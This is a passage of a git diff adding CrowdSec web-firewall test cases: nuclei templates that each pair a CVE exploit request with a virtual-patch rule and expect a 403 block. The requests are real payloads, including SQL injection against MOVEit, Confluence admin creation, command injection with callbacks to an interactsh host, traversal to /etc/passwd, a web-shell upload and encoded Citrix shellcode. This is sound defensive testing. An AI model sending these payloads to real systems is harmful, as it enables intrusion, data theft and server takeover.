diff --git a/.appsec-tests/CVE-2017-9841/CVE-2017-9841.yaml b/.appsec-tests/CVE-2017-9841/CVE-2017-9841.yaml
new file mode 100755
index 00000000000..b529047ba40
--- /dev/null
+++ b/.appsec-tests/CVE-2017-9841/CVE-2017-9841.yaml
@@ -0,0 +1,22 @@
+id: CVE-2017-9841
+info:
+  name: CVE-2017-9841
+  author: crowdsec
+  severity: info
+  description: CVE-2017-9841 testing
+  tags: appsec-testing
+http:
+#this is a dummy request, edit the request(s) to match your needs
+  - raw:
+    - |
+      GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
+      Host: {{Hostname}}
+      Content-Type: text/html
+
+      <?php echo md5(phpunit_rce);?>
+    cookie-reuse: true
+#test will fail because we won't match http status 
+    matchers:
+    - type: status
+      status:
+       - 403
diff --git a/.appsec-tests/CVE-2017-9841/config.yaml b/.appsec-tests/CVE-2017-9841/config.yaml
new file mode 100644
index 00000000000..a2f4cc65848
--- /dev/null
+++ b/.appsec-tests/CVE-2017-9841/config.yaml
@@ -0,0 +1,3 @@
+appsec-rules:
+- ./appsec-rules/crowdsecurity/vpatch-CVE-2017-9841.yaml
+nuclei_template: CVE-2017-9841.yaml
diff --git a/.appsec-tests/CVE-2019-12989/CVE-2019-12989.yaml b/.appsec-tests/CVE-2019-12989/CVE-2019-12989.yaml
new file mode 100755
index 00000000000..47b55008723
--- /dev/null
+++ b/.appsec-tests/CVE-2019-12989/CVE-2019-12989.yaml
@@ -0,0 +1,24 @@
+id: CVE-2019-12989
+info:
+  name: CVE-2019-12989
+  author: crowdsec
+  severity: info
+  description: CVE-2019-12989 testing
+  tags: appsec-testing
+http:
+#this is a dummy request, edit the request(s) to match your needs
+  - raw:
+    - |
+      POST /sdwan/nitro/v1/config/get_package_file?action=file_download HTTP/1.1
+      Host: {{Hostname}}
+      SSL_CLIENT_VERIFY: SUCCESS
+      Content-Type: application/json
+      Content-Length: 178
+
+      {"get_package_file": {"site_name": "blah' union select 'tenable','zero','day','research' INTO OUTFILE '/tmp/token_01234';#","appliance_type": "primary","package_type": "active"}}
+    cookie-reuse: true
+#test will fail because we won't match http status 
+    matchers:
+    - type: status
+      status:
+       - 403
diff --git a/.appsec-tests/CVE-2019-12989/config.yaml b/.appsec-tests/CVE-2019-12989/config.yaml
new file mode 100644
index 00000000000..67c49d711b6
--- /dev/null
+++ b/.appsec-tests/CVE-2019-12989/config.yaml
@@ -0,0 +1,4 @@
+appsec-rules:
+- ./appsec-rules/crowdsecurity/base-config.yaml
+- ./appsec-rules/crowdsecurity/vpatch-CVE-2019-12989.yaml
+nuclei_template: CVE-2019-12989.yaml
diff --git a/.appsec-tests/CVE-2020-11738/CVE-2020-11738.yaml b/.appsec-tests/CVE-2020-11738/CVE-2020-11738.yaml
new file mode 100755
index 00000000000..970cc60edc2
--- /dev/null
+++ b/.appsec-tests/CVE-2020-11738/CVE-2020-11738.yaml
@@ -0,0 +1,20 @@
+id: CVE-2020-11738
+info:
+  name: CVE-2020-11738
+  author: crowdsec
+  severity: info
+  description: CVE-2020-11738 testing
+  tags: appsec-testing
+http:
+#this is a dummy request, edit the request(s) to match your needs
+  - raw:
+    - |
+      GET /wp-admin/admin-ajax.php?action=duplicator_download&file=..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
+      Host: {{Hostname}}
+
+    cookie-reuse: true
+#test will fail because we won't match http status 
+    matchers:
+    - type: status
+      status:
+       - 403
diff --git a/.appsec-tests/CVE-2020-11738/config.yaml b/.appsec-tests/CVE-2020-11738/config.yaml
new file mode 100644
index 00000000000..455ebdac57f
--- /dev/null
+++ b/.appsec-tests/CVE-2020-11738/config.yaml
@@ -0,0 +1,3 @@
+appsec-rules:
+- ./appsec-rules/crowdsecurity/vpatch-CVE-2020-11738.yaml
+nuclei_template: CVE-2020-11738.yaml
diff --git a/.appsec-tests/CVE-2021-22941/CVE-2021-22941.yaml b/.appsec-tests/CVE-2021-22941/CVE-2021-22941.yaml
new file mode 100755
index 00000000000..18028ad2ae1
--- /dev/null
+++ b/.appsec-tests/CVE-2021-22941/CVE-2021-22941.yaml
@@ -0,0 +1,31 @@
+id: CVE-2021-22941
+info:
+  name: CVE-2021-22941
+  author: crowdsec
+  severity: info
+  description: CVE-2021-22941 testing
+  tags: appsec-testing
+http:
+#this is a dummy request, edit the request(s) to match your needs
+  - raw:
+    - |
+      POST /upload.aspx?uploadid=%40using+System.Diagnostics%3B%40%7Bint+idx0%3D+0%3Bstring+str_idx0+%3D+idx0.ToString%28%29%3B+int+idx1+%3D+1%3Bstring+str_idx1+%3D+idx1.ToString%28%29%3Bstring+cmd+%3D+Request.QueryString%5Bstr_idx0%5D%3Bstring+arg+%3D+Request.QueryString%5Bstr_idx1%5D%3BProcess.Start%28cmd%2Carg%29%3B%7D%2F..%2F..%2FConfigService%5CViews%5CShared%5CError.cshtml&bp=123&accountid=123 HTTP/1.1
+      Host: 127.0.0.1:4241
+      User-Agent: python-requests/2.28.2
+      Accept-Encoding: gzip, deflate, br
+      Accept: */*
+      Connection: keep-alive
+      Content-Type: multipart/form-data; boundary=boundary
+      Content-Length: 104
+
+      --boundary
+      Content-Disposition: form-data; name="text4"; filename="text5"
+
+      V8C7BH6OHT
+      --boundary--
+    cookie-reuse: true
+#test will fail because we won't match http status 
+    matchers:
+    - type: status
+      status:
+       - 403
diff --git a/.appsec-tests/CVE-2021-22941/config.yaml b/.appsec-tests/CVE-2021-22941/config.yaml
new file mode 100644
index 00000000000..59865018204
--- /dev/null
+++ b/.appsec-tests/CVE-2021-22941/config.yaml
@@ -0,0 +1,3 @@
+appsec-rules:
+- ./appsec-rules/crowdsecurity/vpatch-CVE-2021-22941.yaml
+nuclei_template: CVE-2021-22941.yaml
diff --git a/.appsec-tests/CVE-2021-3129/CVE-2021-3129.yaml b/.appsec-tests/CVE-2021-3129/CVE-2021-3129.yaml
new file mode 100755
index 00000000000..ece8bdd7075
--- /dev/null
+++ b/.appsec-tests/CVE-2021-3129/CVE-2021-3129.yaml
@@ -0,0 +1,30 @@
+id: CVE-2021-3129
+info:
+  name: CVE-2021-3129
+  author: crowdsec
+  severity: info
+  description: CVE-2021-3129 testing
+  tags: appsec-testing
+http:
+  - raw:
+      - |
+        POST /_ignition/execute-solution HTTP/1.1
+        Host: {{Hostname}}
+        Accept: application/json
+        Content-Type: application/json
+
+        {"solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution", "parameters": {"variableName": "cve20213129", "viewFile": "php://filter/write=convert.quoted-printable-decode|convert.iconv.utf-16le.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log"}}
+      - |
+        POST /_ignition/execute-solution HTTP/1.1
+        Host: {{Hostname}}
+        Accept: application/json
+        Content-Type: application/json
+
+        {"solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution", "parameters": {"variableName": "cve20213129", "viewFile": "phar://../storage/logs/laravel.log/test.txt"}}
+
+    cookie-reuse: true
+#test will fail because we won't match http status 
+    matchers:
+    - type: status
+      status:
+       - 403
diff --git a/.appsec-tests/CVE-2021-3129/config.yaml b/.appsec-tests/CVE-2021-3129/config.yaml
new file mode 100644
index 00000000000..0552429ef9c
--- /dev/null
+++ b/.appsec-tests/CVE-2021-3129/config.yaml
@@ -0,0 +1,4 @@
+appsec-rules:
+- ./appsec-rules/crowdsecurity/base-config.yaml
+- ./appsec-rules/crowdsecurity/vpatch-CVE-2021-3129.yaml
+nuclei_template: CVE-2021-3129.yaml
diff --git a/.appsec-tests/CVE-2022-27926/CVE-2022-27926.yaml b/.appsec-tests/CVE-2022-27926/CVE-2022-27926.yaml
new file mode 100644
index 00000000000..3b0ceb49ff4
--- /dev/null
+++ b/.appsec-tests/CVE-2022-27926/CVE-2022-27926.yaml
@@ -0,0 +1,19 @@
+id: CVE-2022-27926
+
+info:
+  name: Zimbra Collaboration (ZCS) - Cross Site Scripting
+  author: rootxharsh,iamnoooob,pdresearch
+  severity: medium
+  description: |
+    A reflected cross-site scripting (XSS) vulnerability in the /public/launchNewWindow.jsp component of Zimbra Collaboration (aka ZCS) 9.0 allows unauthenticated attackers to execute arbitrary web script or HTML via request parameters.
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/public/error.jsp?errCode=%22%3E%3Cimg%20src=x%20onerror=alert(document.domain)%3E"
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 403
\ No newline at end of file
diff --git a/.appsec-tests/CVE-2022-27926/config.yaml b/.appsec-tests/CVE-2022-27926/config.yaml
new file mode 100644
index 00000000000..f436cbcf62b
--- /dev/null
+++ b/.appsec-tests/CVE-2022-27926/config.yaml
@@ -0,0 +1,3 @@
+appsec-rules:
+- ./appsec-rules/crowdsecurity/vpatch-CVE-2022-27926.yaml
+nuclei_template: CVE-2022-27926.yaml
diff --git a/.appsec-tests/CVE-2022-35914/CVE-2022-35914.yaml b/.appsec-tests/CVE-2022-35914/CVE-2022-35914.yaml
new file mode 100644
index 00000000000..1e51d8cf39d
--- /dev/null
+++ b/.appsec-tests/CVE-2022-35914/CVE-2022-35914.yaml
@@ -0,0 +1,26 @@
+id: CVE-2022-35914
+
+info:
+  name: GLPI <=10.0.2 - Remote Command Execution
+  author: For3stCo1d
+  severity: critical
+  description: |
+    GLPI through 10.0.2 is susceptible to remote command execution injection in /vendor/htmlawed/htmlawed/htmLawedTest.php in the htmlawed module.
+variables:
+  cmd: "cat+/etc/passwd"
+
+http:
+  - raw:
+      - |
+        POST /vendor/htmlawed/htmlawed/htmLawedTest.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+        Cookie: sid=foo
+
+        sid=foo&hhook=exec&text={{cmd}}
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 403
\ No newline at end of file
diff --git a/.appsec-tests/CVE-2022-35914/config.yaml b/.appsec-tests/CVE-2022-35914/config.yaml
new file mode 100644
index 00000000000..19ef93b0fc5
--- /dev/null
+++ b/.appsec-tests/CVE-2022-35914/config.yaml
@@ -0,0 +1,3 @@
+appsec-rules:
+- ./appsec-rules/crowdsecurity/vpatch-CVE-2022-35914.yaml
+nuclei_template: CVE-2022-35914.yaml
diff --git a/.appsec-tests/CVE-2022-44877/CVE-2022-44877.yaml b/.appsec-tests/CVE-2022-44877/CVE-2022-44877.yaml
new file mode 100755
index 00000000000..90061b5d77a
--- /dev/null
+++ b/.appsec-tests/CVE-2022-44877/CVE-2022-44877.yaml
@@ -0,0 +1,22 @@
+id: CVE-2022-44877
+info:
+  name: CVE-2022-44877
+  author: crowdsec
+  severity: info
+  description: CVE-2022-44877 testing
+  tags: appsec-testing
+http:
+#this is a dummy request, edit the request(s) to match your needs
+  - raw:
+    - |
+      POST /login/index.php?login=$(ping${IFS}-nc${IFS}2${IFS}`whoami`.{{interactsh-url}}) HTTP/1.1
+      Host: {{Hostname}}
+      Content-Type: application/x-www-form-urlencoded
+
+      username=root&password=toor&commit=Login
+    cookie-reuse: true
+#test will fail because we won't match http status 
+    matchers:
+    - type: status
+      status:
+       - 403
diff --git a/.appsec-tests/CVE-2022-44877/config.yaml b/.appsec-tests/CVE-2022-44877/config.yaml
new file mode 100644
index 00000000000..6aceab8f633
--- /dev/null
+++ b/.appsec-tests/CVE-2022-44877/config.yaml
@@ -0,0 +1,3 @@
+appsec-rules:
+- ./appsec-rules/crowdsecurity/vpatch-CVE-2022-44877.yaml
+nuclei_template: CVE-2022-44877.yaml
diff --git a/.appsec-tests/CVE-2022-46169/CVE-2022-46169.yaml b/.appsec-tests/CVE-2022-46169/CVE-2022-46169.yaml
new file mode 100644
index 00000000000..b09f4452c24
--- /dev/null
+++ b/.appsec-tests/CVE-2022-46169/CVE-2022-46169.yaml
@@ -0,0 +1,23 @@
+id: CVE-2022-46169
+
+info:
+  name: Cacti <=1.2.22 - Remote Command Injection
+  author: Hardik-Solanki,j4vaovo
+  severity: critical
+  description: |
+    Cacti through 1.2.22 is susceptible to remote command injection. There is insufficient authorization within the remote agent when handling HTTP requests with a custom Forwarded-For HTTP header. An attacker can send a specially crafted HTTP request to the affected instance and execute arbitrary OS commands on the server, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
+variables:
+  useragent: '{{rand_base(6)}}'
+
+http:
+  - raw:
+      - |
+        GET /remote_agent.php?action=polldata&local_data_ids[0]=1&host_id=1&poller_id=%3Bcurl%20{{interactsh-url}}%20-H%20'User-Agent%3a%20{{useragent}}'%3B HTTP/1.1
+        Host: {{Hostname}}
+        X-Forwarded-For: 127.0.0.1
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 403
\ No newline at end of file
diff --git a/.appsec-tests/CVE-2022-46169/config.yaml b/.appsec-tests/CVE-2022-46169/config.yaml
new file mode 100644
index 00000000000..8d9e09dd195
--- /dev/null
+++ b/.appsec-tests/CVE-2022-46169/config.yaml
@@ -0,0 +1,3 @@
+appsec-rules:
+- ./appsec-rules/crowdsecurity/vpatch-CVE-2022-46169.yaml
+nuclei_template: CVE-2022-46169.yaml
diff --git a/.appsec-tests/CVE-2023-20198/CVE-2023-20198.yaml b/.appsec-tests/CVE-2023-20198/CVE-2023-20198.yaml
new file mode 100755
index 00000000000..05cae5e9a4d
--- /dev/null
+++ b/.appsec-tests/CVE-2023-20198/CVE-2023-20198.yaml
@@ -0,0 +1,39 @@
+id: CVE-2023-20198
+info:
+  name: CVE-2023-20198
+  author: crowdsec
+  severity: info
+  description: CVE-2023-20198 testing
+  tags: appsec-testing
+http:
+  - raw:
+    - |
+      POST /%2577ebui_wsma_https HTTP/1.1
+      Host: {{Hostname}}
+
+      <?xml version="1.0"?>
+      <SOAP:Envelope xmlns:SOAP="http://schemas.xmlsoap.org/soap/envelope/" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
+        <SOAP:Header>
+          <wsse:Security xmlns:wsse="http://schemas.xmlsoap.org/ws/2002/04/secext">
+            <wsse:UsernameToken SOAP:mustUnderstand="false">
+              <wsse:Username>#{username}</wsse:Username>
+              <wsse:Password>*****</wsse:Password>
+            </wsse:UsernameToken>
+          </wsse:Security>
+        </SOAP:Header>
+        <SOAP:Body>
+          <request correlator="xxx" xmlns="urn:cisco:wsma-config">
+            <configApply details="all" action-on-fail="continue">
+              <config-data>
+              <cli-config-data-block><![xxx]]></cli-config-data-block>
+              </config-data>
+            </configApply>
+          </request>
+        </SOAP:Body>
+      </SOAP:Envelope>
+    cookie-reuse: true
+#test will fail because we won't match http status 
+    matchers:
+    - type: status
+      status:
+       - 403
diff --git a/.appsec-tests/CVE-2023-20198/config.yaml b/.appsec-tests/CVE-2023-20198/config.yaml
new file mode 100644
index 00000000000..db4af629436
--- /dev/null
+++ b/.appsec-tests/CVE-2023-20198/config.yaml
@@ -0,0 +1,3 @@
+appsec-rules:
+- ./appsec-rules/crowdsecurity/vpatch-CVE-2023-20198.yaml
+nuclei_template: CVE-2023-20198.yaml
diff --git a/.appsec-tests/CVE-2023-22515/CVE-2023-22515.yaml b/.appsec-tests/CVE-2023-22515/CVE-2023-22515.yaml
new file mode 100644
index 00000000000..f4d428850ad
--- /dev/null
+++ b/.appsec-tests/CVE-2023-22515/CVE-2023-22515.yaml
@@ -0,0 +1,28 @@
+id: CVE-2023-22515
+info:
+  name: Atlassian Confluence - Privilege Escalation
+  severity: critical
+  author: crowdsec
+  description: |
+    Atlassian Confluence Data Center and Server contains a privilege escalation vulnerability that allows an attacker to create unauthorized Confluence administrator accounts and access Confluence.
+variables:
+  username: "{{rand_base(10)}}"
+  password: "{{rand_base(10)}}"
+  email: "{{username}}@{{password}}"
+
+http:
+  - raw:
+      - |
+        @timeout:20s
+        POST /setup/setupadministrator.action HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+        X-Atlassian-Token: no-check
+
+        username={{to_lower(username)}}&fullName=admin&email={{email}}.com&password={{password}}&confirm={{password}}&setup-next-button=Next
+    cookie-reuse: true
+    redirects: true
+    matchers:
+      - type: status
+        status:
+          - 403
\ No newline at end of file
diff --git a/.appsec-tests/CVE-2023-22515/config.yaml b/.appsec-tests/CVE-2023-22515/config.yaml
new file mode 100644
index 00000000000..941b820282e
--- /dev/null
+++ b/.appsec-tests/CVE-2023-22515/config.yaml
@@ -0,0 +1,3 @@
+appsec-rules:
+- ./appsec-rules/crowdsecurity/vpatch-CVE-2023-22515.yaml
+nuclei_template: CVE-2023-22515.yaml
diff --git a/.appsec-tests/CVE-2023-24489/CVE-2023-24489.yaml b/.appsec-tests/CVE-2023-24489/CVE-2023-24489.yaml
new file mode 100755
index 00000000000..69468a5212b
--- /dev/null
+++ b/.appsec-tests/CVE-2023-24489/CVE-2023-24489.yaml
@@ -0,0 +1,31 @@
+id: CVE-2023-24489
+info:
+  name: CVE-2023-24489
+  author: crowdsec
+  severity: info
+  description: CVE-2023-24489 testing
+  tags: appsec-testing
+variables:
+  fileName: '{{rand_base(8)}}'
+  #in real life padding varies to abuse the crypto bug
+  padding: 'QUFBQUFBQUFBQUFBQUFBAEFBQUFBQUFBQUFBQUFBQUE='
+http:
+  - raw:
+      - |
+        POST /documentum/upload.aspx?parentid={{padding}}&raw=1&unzip=on&uploadid={{fileName}}\..\..\..\cifs&filename={{fileName}}.aspx HTTP/1.1
+        Host: {{Hostname}}
+
+        <%@ Page Language="C#" Debug="true" Trace="false" %>
+        <script Language="c#" runat="server">
+        void Page_Load(object sender, EventArgs e)
+        {
+            Response.Write("{{randstr}}");
+        }
+        </script>
+
+    cookie-reuse: true
+#test will fail because we won't match http status 
+    matchers:
+    - type: status
+      status:
+       - 403
\ No newline at end of file
diff --git a/.appsec-tests/CVE-2023-24489/config.yaml b/.appsec-tests/CVE-2023-24489/config.yaml
new file mode 100644
index 00000000000..db388766b6e
--- /dev/null
+++ b/.appsec-tests/CVE-2023-24489/config.yaml
@@ -0,0 +1,4 @@
+appsec-rules:
+- ./appsec-rules/crowdsecurity/base-config.yaml
+- ./appsec-rules/crowdsecurity/vpatch-CVE-2023-24489.yaml
+nuclei_template: CVE-2023-24489.yaml
diff --git a/.appsec-tests/CVE-2023-33617/CVE-2023-33617.yaml b/.appsec-tests/CVE-2023-33617/CVE-2023-33617.yaml
new file mode 100755
index 00000000000..4894a4eea05
--- /dev/null
+++ b/.appsec-tests/CVE-2023-33617/CVE-2023-33617.yaml
@@ -0,0 +1,40 @@
+id: cve-2023-33617
+info:
+  name: cve-2023-33617
+  author: crowdsec
+  severity: info
+  description: cve-2023-33617 testing
+  tags: appsec-testing
+http:
+#we're testing two requests:
+# 1. login with default creds
+# 2. exploitation of the actual vuln
+# 3. the last one shouldn't match
+  - raw:
+    - |
+      POST /boaform/admin/formLogin HTTP/1.1
+      Host: {{Hostname}}
+      Content-Type: application/x-www-form-urlencoded
+
+      username=admin&psd=parks
+    - |
+      POST /boaform/admin/formPing HTTP/1.1
+      Host: {{Hostname}}
+      Content-Type: application/x-www-form-urlencoded
+
+      target_addr=1.2.3.4;cat /etc/passwd
+    - |
+      POST /boaform/admin/formPing HTTP/1.1
+      Host: {{Hostname}}
+      Content-Type: application/x-www-form-urlencoded
+
+      target_addr=1.2.3.4
+    cookie-reuse: true
+#test will fail because we won't match http status 
+    matchers:
+    - type: dsl
+      condition: and
+      dsl:
+        - 'status_code_1 == 403'
+        - 'status_code_2 == 403'
+        - 'status_code_3 == 404'
\ No newline at end of file
diff --git a/.appsec-tests/CVE-2023-33617/config.yaml b/.appsec-tests/CVE-2023-33617/config.yaml
new file mode 100644
index 00000000000..4a7289b5bfa
--- /dev/null
+++ b/.appsec-tests/CVE-2023-33617/config.yaml
@@ -0,0 +1,3 @@
+appsec-rules:
+- ./appsec-rules/crowdsecurity/vpatch-CVE-2023-33617.yaml
+nuclei_template: CVE-2023-33617.yaml
diff --git a/.appsec-tests/CVE-2023-34362/CVE-2023-34362.yaml b/.appsec-tests/CVE-2023-34362/CVE-2023-34362.yaml
new file mode 100644
index 00000000000..6c1ce11f2a5
--- /dev/null
+++ b/.appsec-tests/CVE-2023-34362/CVE-2023-34362.yaml
@@ -0,0 +1,29 @@
+id: CVE-2023-34362
+
+info:
+  name: MOVEit Transfer - Remote Code Execution
+  author: princechaddha,rootxharsh,ritikchaddha,pdresearch
+  severity: critical
+variables:
+  sessioncookie: "{{randstr}}"
+  ips: "127.0.0.1"
+
+http:
+  - raw:
+      - |
+        POST /moveitisapi/moveitisapi.dll?action=m2 HTTP/1.1
+        Host: {{Hostname}}
+        User-Agent: python-requests/2.26.0
+        Accept-Encoding: gzip, deflate
+        Accept: */*
+        Ax-silock-transaction: folder_add_by_path
+        X-siLock-Transaction: session_setvars
+        X-siLock-SessVar0: MyPkgID: 0
+        X-siLock-SessVar1: MyPkgSelfProvisionedRecips: SQL Injection'); INSERT INTO activesessions (SessionID) values ('{{sessioncookie}}');UPDATE activesessions SET Username=(select Username from users order by permission desc limit 1) WHERE SessionID='{{sessioncookie}}';UPDATE activesessions SET LoginName='test@test.com' WHERE SessionID='{{sessioncookie}}';UPDATE activesessions SET RealName='test@test.com' WHERE SessionID='{{sessioncookie}}';UPDATE activesessions SET InstId='1234' WHERE SessionID='{{sessioncookie}}';UPDATE activesessions SET IpAddress='{{ips}}' WHERE SessionID='{{sessioncookie}}';UPDATE activesessions SET LastTouch='2099-06-10 09:30:00' WHERE SessionID='{{sessioncookie}}';UPDATE activesessions SET DMZInterface='10' WHERE SessionID='{{sessioncookie}}';UPDATE activesessions SET Timeout='60' WHERE SessionID='{{sessioncookie}}';UPDATE activesessions SET ResilNode='10' WHERE SessionID='{{sessioncookie}}';UPDATE activesessions SET AcctReady='1' WHERE SessionID='{{sessioncookie}}'; -- asdf
+        Cookie: siLockLongTermInstID=0
+        Content-Length: 0
+    matchers:
+      - type: status
+        status:
+          - 403
+
diff --git a/.appsec-tests/CVE-2023-34362/config.yaml b/.appsec-tests/CVE-2023-34362/config.yaml
new file mode 100644
index 00000000000..7035605a2d7
--- /dev/null
+++ b/.appsec-tests/CVE-2023-34362/config.yaml
@@ -0,0 +1,3 @@
+appsec-rules:
+- ./appsec-rules/crowdsecurity/vpatch-CVE-2023-34362.yaml
+nuclei_template: CVE-2023-34362.yaml
diff --git a/.appsec-tests/CVE-2023-3519/CVE-2023-3519.yaml b/.appsec-tests/CVE-2023-3519/CVE-2023-3519.yaml
new file mode 100755
index 00000000000..91fcff6f144
--- /dev/null
+++ b/.appsec-tests/CVE-2023-3519/CVE-2023-3519.yaml
@@ -0,0 +1,20 @@
+id: CVE-2023-3519
+info:
+  name: CVE-2023-3519
+  author: crowdsec
+  severity: info
+  description: CVE-2023-3519 testing
+  tags: appsec-testing
+http:
+#this is a dummy request, edit the request(s) to match your needs
+  - raw:
+    - |
+      GET /gwtest/formssso?event=start&target=DrKQG9NqdhyZwRtgjotDXh3NufqkpYGOSipe6bBUYDaTfAJtcMFoDjBi6UjPMfBxPOicdLS6ODbGeP6qsZOzjzpxCPD1Rzz9OEcKMfKkWbaxDj72jrJgO7NhFYzPHAFrdOuzmpkdSgFG8RtO7bKzUXpLhvwWchkJX1BUoCk0��a�%30%02%00%00%65%78%70%6f%72%74%20%50%41%54%48%3d%2f%76%61%72%2f%70%79%74%68%6f%6e%2f%62%69%6e%3a%24%50%41%54%48%3b%65%63%68%6f%20%65%78%65%63%5c%28%5f%5f%69%6d%70%6f%72%74%5f%5f%5c%28%5c%27%7a%6c%69%62%5c%27%5c%29%2e%64%65%63%6f%6d%70%72%65%73%73%5c%28%5f%5f%69%6d%70%6f%72%74%5f%5f%5c%28%5c%27%62%61%73%65%36%34%5c%27%5c%29%2e%62%36%34%64%65%63%6f%64%65%5c%28%5f%5f%69%6d%70%6f%72%74%5f%5f%5c%28%5c%27%63%6f%64%65%63%73%5c%27%5c%29%2e%67%65%74%65%6e%63%6f%64%65%72%5c%28%5c%27%75%74%66%2d%38%5c%27%5c%29%5c%28%5c%27%65%4e%6f%39%55%45%31%4c%78%44%41%51%50%54%65%2f%49%72%63%6b%47%45%4f%37%31%4b%4b%4c%46%55%51%38%69%49%6a%67%65%68%4f%52%4e%68%6b%31%4e%45%31%43%6b%74%57%71%2b%4e%39%74%79%4f%49%63%5a%6e%67%7a%62%39%35%38%36%4e%6d%37%6b%48%42%30%63%6f%4c%45%76%34%30%65%2b%54%68%45%36%46%6f%65%55%39%6a%4c%78%4a%4f%65%41%62%32%36%67%42%65%73%4c%51%36%44%66%51%50%61%31%47%79%4c%71%68%53%2b%56%6c%2f%46%76%6a%53%4c%45%75%69%47%48%2f%44%75%2f%75%72%32%5a%66%66%34%63%48%31%35%78%7a%4a%50%53%47%63%74%79%45%51%70%61%63%34%32%6f%75%6c%4f%52%62%33%36%6c%76%42%32%4e%5a%59%35%59%34%42%68%51%68%55%73%45%6e%7a%4b%34%6e%6d%36%69%41%62%41%30%78%4f%47%54%46%2b%57%45%6e%76%72%42%7a%6c%52%63%6e%46%44%65%42%51%42%35%41%64%64%42%5a%37%71%5a%36%54%36%41%7a%59%4d%66%62%35%72%41%39%69%41%70%59%71%64%6d%31%56%4f%48%66%31%58%6a%30%75%61%49%56%68%41%30%6e%79%33%55%43%44%64%37%41%50%45%53%4d%73%4c%78%4e%69%31%4f%61%6b%67%4d%2f%6b%50%69%57%51%62%66%78%6e%36%41%79%44%6e%58%7a%51%5c%3d%5c%27%5c%29%5c%5b%30%5c%5d%5c%29%5c%29%5c%29%20%7c%20%65%78%65%63%20%24%28%77%68%69%63%68%20%70%79%74%68%6f%6e%20%7c%7c%20%77%68%69%63%68%20%70%79%74%68%6f%6e%33%20%7c%7c%20%77%68%69%63%68%20%70%79%74%68%6f%6e%32%29%20%2d%00%5f�%02%00%00%00%72%00%5e%48��%40%63�%01%48%81�%00%02%00%00��%48%31�%48%81Ĩ%15%00%00%68%03%24%78%00� HTTP/1.1
+      Host: {{Hostname}}
+      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
+    cookie-reuse: true
+#test will fail because we won't match http status 
+    matchers:
+    - type: status
+      status:
+       - 403
diff --git a/.appsec-tests/CVE-2023-3519/config.yaml b/.appsec-tests/CVE-2023-3519/config.yaml
new file mode 100644
index 00000000000..bbb902a9678
--- /dev/null
+++ b/.appsec-tests/CVE-2023-3519/config.yaml
@@ -0,0 +1,3 @@
+appsec-rules:
+- ./appsec-rules/crowdsecurity/vpatch-CVE-2023-3519.yaml
+nuclei_template: CVE-2023-3519.yaml
diff --git a/.appsec-tests/CVE-2023-38205/CVE-2023-38205.yaml b/.appsec-tests/CVE-2023-38205/CVE-2023-38205.yaml
new file mode 100755
index 00000000000..0043e395418
--- /dev/null
+++ b/.appsec-tests/CVE-2023-38205/CVE-2023-38205.yaml
@@ -0,0 +1,20 @@
+id: CVE-2023-38205
+info:
+  name: CVE-2023-38205
+  author: crowdsec
+  severity: info
+  description: CVE-2023-38205 testing
+  tags: appsec-testing
+http:
+#this is a dummy request, edit the request(s) to match your needs
+  - raw:
+    - |
+      GET /hax/..CFIDE/wizards/common/utils.cfc?method=wizardHash&inPassword=foo&_cfclient=true&returnFormat=wddx HTTP/1.1
+      Host: {{Hostname}}
+
+    cookie-reuse: true
+#test will fail because we won't match http status 
+    matchers:
+    - type: status
+      status:
+       - 403
diff --git a/.appsec-tests/CVE-2023-38205/config.yaml b/.appsec-tests/CVE-2023-38205/config.yaml
new file mode 100644
index 00000000000..7c5e456aef0
--- /dev/null
+++ b/.appsec-tests/CVE-2023-38205/config.yaml
@@ -0,0 +1,3 @@
+appsec-rules:
+- ./appsec-rules/crowdsecurity/vpatch-CVE-2023-38205.yaml
+nuclei_template: CVE-2023-38205.yaml
diff --git a/.appsec-tests/CVE-2023-50164/CVE-2023-50164.yaml b/.appsec-tests/CVE-2023-50164/CVE-2023-50164.yaml
new file mode 100755
index 00000000000..43ccb950eb3
--- /dev/null
+++ b/.appsec-tests/CVE-2023-50164/CVE-2023-50164.yaml
@@ -0,0 +1,79 @@
+id: CVE-2023-50164
+info:
+  name: CVE-2023-50164
+  author: crowdsec
+  severity: info
+  description: CVE-2023-50164 testing
+  tags: appsec-testing
+http:
+  - raw:
+    - |
+      POST /s2_066_war_exploded/upload.action HTTP/1.1
+      Host: {{Hostname}}
+      Accept-Language: en-US,en;q=0.9
+      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
+      Accept-Encoding: gzip, deflate, br
+      Content-Type: multipart/form-data; boundary=----WebKitFormBoundary5WJ61X4PRwyYKlip
+      Content-Length: 593
+      
+      ------WebKitFormBoundary5WJ61X4PRwyYKlip
+      Content-Disposition: form-data; name="upload"; filename="poc.txt"
+      Content-Type: text/plain
+      
+      test
+      
+      
+      ------WebKitFormBoundary5WJ61X4PRwyYKlip
+      Content-Disposition: form-data; name="uploadFileName";
+      
+      ../../poc.txt
+      
+      ------WebKitFormBoundary5WJ61X4PRwyYKlip--
+    - |
+      POST /s2_066_war_exploded/upload.action HTTP/1.1
+      Host: {{Hostname}}
+      Accept-Language: en-US,en;q=0.9
+      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
+      Accept-Encoding: gzip, deflate, br
+      Content-Type: multipart/form-data; boundary=----WebKitFormBoundary5WJ61X4PRwyYKlip
